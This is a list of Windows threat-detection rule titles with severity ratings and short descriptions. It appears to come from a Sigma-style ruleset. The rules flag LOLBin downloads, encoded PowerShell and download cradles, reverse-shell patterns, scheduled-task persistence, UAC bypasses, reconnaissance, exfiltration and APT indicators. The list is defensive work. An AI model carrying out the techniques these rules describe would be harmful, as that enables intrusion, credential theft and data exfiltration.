Using SettingSyncHost.exe as LOLBinhighDetects using SettingSyncHost.exe to run hijacked binary
Use Of The SFTP.EXE Binary As A LOLBINmediumDetects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
MMC20 Lateral MovementhighDetects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
Arbitrary File Download Via MSEDGE_PROXY.EXEmediumDetects usage of "msedge_proxy.exe" to download arbitrary files
Remotely Hosted HTA File Executed Via Mshta.EXEhighDetects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
Wscript Shell Run In CommandLinemediumDetects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
MSHTA Suspicious Execution 01highDetection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
Suspicious Mshta.EXE Execution PatternshighDetects suspicious mshta process execution patterns
Arbitrary File Download Via MSOHTMED.EXEmediumDetects usage of "MSOHTMED" to download arbitrary files
Arbitrary File Download Via MSPUB.EXEmediumDetects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
Detection of PowerShell Execution via Sqlps.exemediumThis rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
SQL Client Tools PowerShell Session DetectionmediumThis rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Start Windows Service Via Net.EXElowDetects the usage of the "net.exe" command to start a service using the "start" flag
Outlook EnableUnsafeClientMailRules Setting EnabledhighDetects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
Suspicious Outlook Child ProcesshighDetects a suspicious process spawning from an Outlook process.
Suspicious Remote Child Process From OutlookhighDetects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
Suspicious Binary In User Directory Spawned From Office ApplicationhighDetects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
Suspicious Microsoft Office Child ProcesshighDetects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
PDQ Deploy Remote Adminstartion Tool ExecutionmediumDetect use of PDQ Deploy remote admin tool
Potentially Suspicious Execution Of PDQDeployRunnermediumDetects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
Perl Inline Command ExecutionmediumDetects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
Php Inline Command ExecutionmediumDetects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
AADInternals PowerShell Cmdlets Execution - ProccessCreationhighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Add Windows Capability Via PowerShell CmdletmediumDetects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
Suspicious Encoded PowerShell Command LinehighDetects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
Suspicious PowerShell Encoded Command PatternshighDetects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
PowerShell Base64 Encoded FromBase64String CmdlethighDetects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
Malicious Base64 Encoded PowerShell Keywords in Command LineshighDetects base64 encoded strings used in hidden malicious PowerShell command lines
PowerShell Base64 Encoded IEX CmdlethighDetects usage of a base64 encoded "IEX" cmdlet in a process command line
PowerShell Base64 Encoded Invoke KeywordhighDetects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
PowerShell Base64 Encoded Reflective Assembly LoadhighDetects base64 encoded .NET reflective loading of Assembly
Suspicious Encoded And Obfuscated Reflection Assembly Load Function CallhighDetects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
PowerShell Base64 Encoded WMI ClasseshighDetects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
Potential PowerShell Obfuscation Via Reversed CommandshighDetects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
ConvertTo-SecureString Cmdlet Usage Via CommandLinemediumDetects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
Potential PowerShell Command Line ObfuscationhighDetects the PowerShell command lines with special characters
PowerShell Execution With Potential Decryption CapabilitieshighDetects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
Potential PowerShell Downgrade AttackmediumDetects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
PowerShell Web DownloadmediumDetects suspicious ways to download files or content using PowerShell
Obfuscated PowerShell OneLiner ExecutionhighDetects the execution of a specific OneLiner to download and execute powershell modules in memory.
Potential DLL File Download Via PowerShell Invoke-WebRequestmediumDetects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
PowerShell Download and Execution CradleshighDetects PowerShell download and execution cradles.
PowerShell Download PatternmediumDetects a Powershell process that contains download commands in its command line string
Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXEhighDetects potentially suspicious file downloads from file sharing domains using PowerShell.exe
DSInternals Suspicious PowerShell CmdletshighDetects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
Suspicious Execution of Powershell with Base64mediumCommandline to launch powershell with a base64 payload
Potential Encoded PowerShell Patterns In CommandLinelowDetects specific combinations of encoding methods in PowerShell via the commandline
Powershell Inline Execution From A FilemediumDetects inline execution of PowerShell code from a file
Certificate Exported Via PowerShellmediumDetects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
Suspicious PowerShell IEX Execution PatternshighDetects suspicious ways to run Invoke-Execution using IEX alias
Import PowerShell Modules From Suspicious Directories - ProcCreationmediumDetects powershell scripts that import modules from suspicious directories
Malicious PowerShell Commandlets - ProcessCreationhighDetects Commandlet names from well-known PowerShell exploitation frameworks
Non Interactive PowerShell Process SpawnedlowDetects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
Potential PowerShell Obfuscation Via WCHARhighDetects suspicious encoded character syntax often used for defense evasion
Execution of Powershell Script in Public FolderhighThis rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
Potential Powershell ReverseShell ConnectionhighDetects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
Run PowerShell Script from Redirected Input StreamhighDetects PowerShell script execution via input stream redirect
Suspicious PowerShell Invocation From Script EnginesmediumDetects suspicious powershell invocations from interpreters or unusual programs
Change PowerShell Policies to an Insecure LevelmediumDetects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
Service StartupType Change Via PowerShell Set-ServicemediumDetects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
Exchange PowerShell Snap-Ins UsagehighDetects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
Suspicious PowerShell Download and Execute PatternhighDetects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
Suspicious PowerShell Parameter SubstringhighDetects suspicious PowerShell invocation with a parameter substring
Suspicious PowerShell Parent ProcesshighDetects a suspicious or uncommon parent processes of PowerShell
PowerShell Script Run in AppDatamediumDetects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
PowerShell DownloadFilehighDetects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
Net WebClient Casing AnomalieshighDetects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
Suspicious XOR Encoded PowerShell CommandmediumDetects presence of a potentially xor encoded powershell command
Arbitrary File Download Via PresentationHost.EXEmediumDetects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
XBAP Execution From Uncommon Locations Via PresentationHost.EXEmediumDetects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
Visual Studio NodejsTools PressAnyKey Arbitrary Binary ExecutionmediumDetects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
PUA - AdvancedRun ExecutionmediumDetects the execution of AdvancedRun utility
PUA - CsExec ExecutionhighDetects the use of the lesser known remote execution tool named CsExec a PsExec alternative
PUA - NirCmd ExecutionmediumDetects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
PUA - NirCmd Execution As LOCAL SYSTEMhighDetects the use of NirCmd tool for command execution as SYSTEM user
PUA - NSudo ExecutionhighDetects the use of NSudo tool for command execution
PUA - Radmin Viewer Utility ExecutionmediumDetects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
PUA - RunXCmd ExecutionhighDetects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
PUA - Wsudo Suspicious ExecutionhighDetects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
Python Inline Command ExecutionmediumDetects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.
Python Spawning Pretty TTY on WindowshighDetects python spawning a pretty tty
Query Usage To Exfil DatamediumDetects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
Suspicious Greedy Compression Using Rar.EXEhighDetects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
Suspicious RASdial ActivitymediumDetects suspicious process related to rasdial.exe
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLIhighDetects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
Regsvr32 DLL Execution With Uncommon ExtensionmediumDetects a "regsvr32" execution where the DLL doesn't contain a common file extension.
Remote Access Tool - AnyDesk Execution With Known Revoked Signing CertificatemediumDetects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
Remote Access Tool - ScreenConnect Remote Command ExecutionlowDetects the execution of a system command via the ScreenConnect RMM service.
Renamed CURL.EXE ExecutionmediumDetects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
Renamed FTP.EXE ExecutionmediumDetects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
Renamed Jusched.EXE ExecutionhighDetects the execution of a renamed "jusched.exe" as seen used by the cobalt group
Renamed NirCmd.EXE ExecutionhighDetects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
Renamed PingCastle Binary ExecutionhighDetects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
Visual Studio NodejsTools PressAnyKey Renamed ExecutionmediumDetects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
Potential Renamed Rundll32 ExecutionhighDetects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
Renamed PsExec Service ExecutionhighDetects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators
Ruby Inline Command ExecutionmediumDetects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
Mshtml.DLL RunHTMLApplication Suspicious UsagehighDetects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
Shell32 DLL Execution in Suspicious DirectoryhighDetects shell32.dll executing a DLL in a suspicious directory
Potential ShellDispatch.DLL Functionality AbusemediumDetects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
Potentially Suspicious Rundll32.EXE Execution of UDL FilemediumDetects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
Rundll32 UNC Path ExecutionhighDetects rundll32 execution where the DLL is located on a remote location (share)
Suspicious Modification Of Scheduled TaskshighDetects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload
Rundll32 Execution Without ParametershighDetects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
Suspicious Schtasks Execution AppData FolderhighDetects the creation of a schtask that executes a file from C:\Users\\AppData\Local
Scheduled Task Creation Via Schtasks.EXElowDetects the creation of scheduled tasks by user accounts via the "schtasks" utility.
Suspicious Scheduled Task Creation Involving Temp FolderhighDetects the creation of scheduled tasks that involves a temporary folder and runs only once
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXEmediumDetects Schtask creations that point to a suspicious folder or an environment variable often used by malware
Schtasks From Suspicious FoldershighDetects scheduled task creations that have suspicious action command and folder combinations
Suspicious Scheduled Task Name As GUIDmediumDetects creation of a scheduled task with a GUID like name
Uncommon One Time Only Scheduled Task At 00:00highDetects scheduled task creation events that include suspicious actions, and is run once at 00:00
Potential Persistence Via Powershell Search Order Hijacking - TaskhighDetects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
Scheduled Task Executing Payload from RegistrymediumDetects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
Scheduled Task Executing Encoded Payload from RegistryhighDetects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
Suspicious Schtasks Schedule TypeshighDetects scheduled task creations or modification on a suspicious schedule type
Suspicious Schtasks Schedule Type With High PrivilegesmediumDetects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
Suspicious Command Patterns In Scheduled Task CreationhighDetects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
Schtasks Creation Or Modification With SYSTEM PrivilegeshighDetects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
Script Event Consumer Spawning ProcesshighDetects a suspicious child process of Script Event Consumer (scrcons.exe).
Service StartupType Change Via Sc.EXEmediumDetect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
Uncommon Child Processes Of SndVol.exemediumDetects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
Suspicious Spool Service Child ProcesshighDetects suspicious print spool service (spoolsv.exe) child processes.
Arbitrary File Download Via Squirrel.EXEmediumDetects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Process Proxy Execution Via Squirrel.EXEmediumDetects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Arbitrary Shell Command Execution Via Settingcontent-MsmediumThe .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Potential Suspicious Browser Launch From Document Reader ProcessmediumDetects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
Potential Data Exfiltration Activity Via CommandLine ToolshighDetects the use of various CLI utilities exfiltrating data via web requests
Suspicious Electron Application Child ProcessesmediumDetects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
Potentially Suspicious Electron Application CommandLinemediumDetects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
Elevated System Shell Spawned From Uncommon Parent LocationmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.
Hidden Powershell in Link File PatternmediumDetects events that appear when a user click on a link file with a powershell command in it
Potentially Suspicious Execution From Parent Process In Public FolderhighDetects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
Suspicious File Characteristics Due to Missing FieldsmediumDetects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBShighDetects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
Base64 MZ Header In CommandLinehighDetects encoded base64 MZ header in the commandline
Potential WinAPI Calls Via CommandLinehighDetects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
Potential File Download Via MS-AppInstaller Protocol HandlermediumDetects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
Suspicious Scan Loop NetworkmediumAdversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
Suspicious Program NameshighDetects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
Script Interpreter Execution From Suspicious FolderhighDetects a suspicious script execution in temporary folders or folders accessible by environment variables
Suspicious Script Execution From Temp FolderhighDetects a suspicious script executions from temporary folder
Windows Shell/Scripting Processes Spawning Suspicious ProgramshighDetects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
Tasks Folder EvasionhighThe Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Weak or Abused Passwords In CLImediumDetects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline
Usage Of Web Request Commands And CmdletsmediumDetects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
Psexec ExecutionmediumDetects user accept agreement execution in psexec commandline
PsExec Service Child Process Execution as LOCAL SYSTEMhighDetects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
PsExec Service ExecutionmediumDetects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution
Potential Binary Impersonating Sysinternals ToolsmediumDetects binaries that use the same name as legitimate sysinternals tools to evade detection
Sysprep on AppData FoldermediumDetects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
New Virtual Smart Card Created Via TpmVscMgr.EXEmediumDetects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
CMSTP UAC Bypass via COM Object AccesshighDetects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
Potential RDP Session Hijacking ActivitymediumDetects potential RDP Session Hijacking activity on Windows systems
UAC Bypass Using IDiagnostic ProfilehighDetects the "IDiagnosticProfileUAC" UAC bypass technique
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change ScriptmediumDetects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change ScripthighDetects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
VMToolsd Suspicious Child ProcesshighDetects suspicious child process creations of VMware Tools process which may indicate persistence setup
Potentially Suspicious Child Process Of VsCodemediumDetects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
Wab Execution From Non Default LocationhighDetects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
Wab/Wabmig Unusual Parent Or Child ProcesseshighDetects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
Potentially Suspicious WebDAV LNK ExecutionmediumDetects possible execution via LNK file accessed on a WebDAV server.
Potential ReflectDebugger Content Execution Via WerFault.EXEmediumDetects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
Suspicious Execution Location Of Wermgr.EXEhighDetects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
Suspicious File Download From IP Via Wget.EXEhighDetects potentially suspicious file downloads directly from IP addresses using Wget.exe
Suspicious File Download From File Sharing Domain Via Wget.EXEhighDetects potentially suspicious file downloads from file sharing domains using wget.exe
Suspicious File Download From IP Via Wget.EXE - PathshighDetects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
Suspicious WindowsTerminal Child ProcessesmediumDetects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
Add New Download Source To WingetmediumDetects usage of winget to add new additional download sources
Add Insecure Download Source To WingethighDetects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
Add Potential Suspicious New Download Source To WingetmediumDetects usage of winget to add new potentially suspicious download sources
Install New Package Via Winget Local ManifestmediumDetects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.
Potentially Suspicious Child Process Of WinRAR.EXEmediumDetects potentially suspicious child processes of WinRAR.exe.
Remote PowerShell Session Host Process (WinRM)mediumDetects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
New Process Created Via Wmic.EXEmediumDetects new process creation using WMIC via the "process call create" flag
Computer System Reconnaissance Via Wmic.EXEmediumDetects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
Hardware Model Reconnaissance Via Wmic.EXEmediumDetects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
Windows Hotfix Updates Reconnaissance Via Wmic.EXEmediumDetects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
Process Reconnaissance Via Wmic.EXEmediumDetects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
Potential Product Reconnaissance Via Wmic.EXEmediumDetects the execution of WMIC in order to get a list of firewall and antivirus products
Potential Product Class Reconnaissance Via Wmic.EXEmediumDetects the execution of WMIC in order to get a list of firewall and antivirus products
Service Reconnaissance Via Wmic.EXEmediumAn adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
Potential Unquoted Service Path Reconnaissance Via Wmic.EXEmediumDetects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
System Disk And Volume Reconnaissance Via Wmic.EXEmediumAn adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon.
WMIC Remote Command ExecutionmediumDetects the execution of WMIC to query information on a remote system
Service Started/Stopped Via Wmic.EXEmediumDetects usage of wmic to start or stop a service
Potential SquiblyTwo Technique ExecutionmediumDetects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
Suspicious WMIC Execution Via Office ProcesshighOffice application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
Suspicious Process Created Via Wmic.EXEhighDetects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
Application Terminated Via Wmic.EXEmediumDetects calls to the "terminate" function via wmic in order to kill an application
Application Removed Via Wmic.EXEmediumDetects the removal or uninstallation of an application via "Wmic.EXE".
WmiPrvSE Spawned A ProcessmediumDetects WmiPrvSE spawning a process
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShellmediumDetects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
Suspicious WmiPrvSE Child ProcesshighDetects suspicious and uncommon child processes of WmiPrvSE
Potential Dropper Script Execution Via WScript/CScriptmediumDetects wscript/cscript executions of scripts located in user directories
Cscript/Wscript Potentially Suspicious Child ProcessmediumDetects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
Cscript/Wscript Uncommon Script Extension ExecutionhighDetects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
WSL Child Process AnomalymediumDetects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
Windows Binary Executed From WSLmediumDetects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships
Proxy Execution Via Wuauclt.EXEhighDetects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
Cab File Extraction Via Wusa.EXE From Potentially Suspicious PathshighDetects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
Wusa.EXE Executed By Parent Process Located In Suspicious LocationhighDetects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
CMSTP Execution Registry EventhighDetects various indicators of Microsoft Connection Manager Profile Installer execution
Registry Entries For Azorult MalwarecriticalDetects the presence of a registry key created during Azorult execution
PrinterNightmare Mimikatz Driver NamecriticalDetects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
DLL Load via LSASShighDetects a method to load DLL via LSASS process using an undocumented Registry key
Potential CobaltStrike Service Installations - RegistryhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
Blue Mockingbird - RegistryhighAttempts to detect system changes made by Blue Mockingbird
New Application in AppCompatinformationalA General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
Enable Microsoft Dynamic Data ExchangemediumEnable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
PowerShell Script Execution Policy EnabledlowDetects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
PowerShell as a Service in RegistryhighDetects that a powershell code is written to the registry as a service.
Potentially Suspicious Command Executed Via Run Dialog Box - RegistryhighDetects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
Suspicious Scripting in a WMI ConsumerhighDetects suspicious commands that are related to scripting/powershell in WMI Event Consumers
Suspicious Encoded Scripts in a WMI ConsumerhighDetects suspicious encoded payloads in WMI Event Consumers
ZxShell MalwarecriticalDetects a ZxShell start by the called and well-known function name
Turla Group Lateral MovementcriticalDetects automated lateral movement by Turla group
Turla Group Commands May 2020criticalDetects commands used by Turla group as reported by ESET in May 2020
Exploit for CVE-2017-0261mediumDetects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
Droppers Exploiting CVE-2017-11882criticalDetects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
Exploit for CVE-2017-8759criticalDetects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
Adwind RAT / JRAThighDetects javaw.exe in AppData folder as used by Adwind / JRAT
Fireball Archer InstallhighDetects Archer malware invocation via rundll32
Potential APT10 Cloud Hopper ActivityhighDetects potential process and execution activity related to APT10 Cloud Hopper operation
Turla Group Named PipescriticalDetects a named pipe used by Turla group samples
Elise Backdoor ActivitycriticalDetects Elise backdoor activity used by APT32
Sofacy Trojan Loader ActivityhighDetects Trojan loader activity as used by APT28
APT29 2018 Phishing Campaign CommandLine IndicatorscriticalDetects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
Potential MuddyWater APT ActivityhighDetects potential Muddywater APT activity
TropicTrooper Campaign November 2018highDetects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
Exploiting SetupComplete.cmd CVE-2019-1378highDetects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
Potential Baby Shark Malware ActivityhighDetects activity that could be related to Baby Shark malware
Potential Emotet ActivityhighDetects all Emotet like process executions that are not covered by the more generic rules
Potential QBot ActivitycriticalDetects potential QBot activity by looking for process executions used previously by QBot
Potential Snatch Ransomware ActivityhighDetects specific process characteristics of Snatch ransomware word document droppers
Ursnif Malware C2 URL PatterncriticalDetects Ursnif C2 traffic.
Potential Ursnif Malware Activity - RegistryhighDetects registry keys related to Ursnif malware.
Operation Wocao ActivityhighDetects activity mentioned in Operation Wocao report
Operation Wocao Activity - SecurityhighDetects activity mentioned in Operation Wocao report
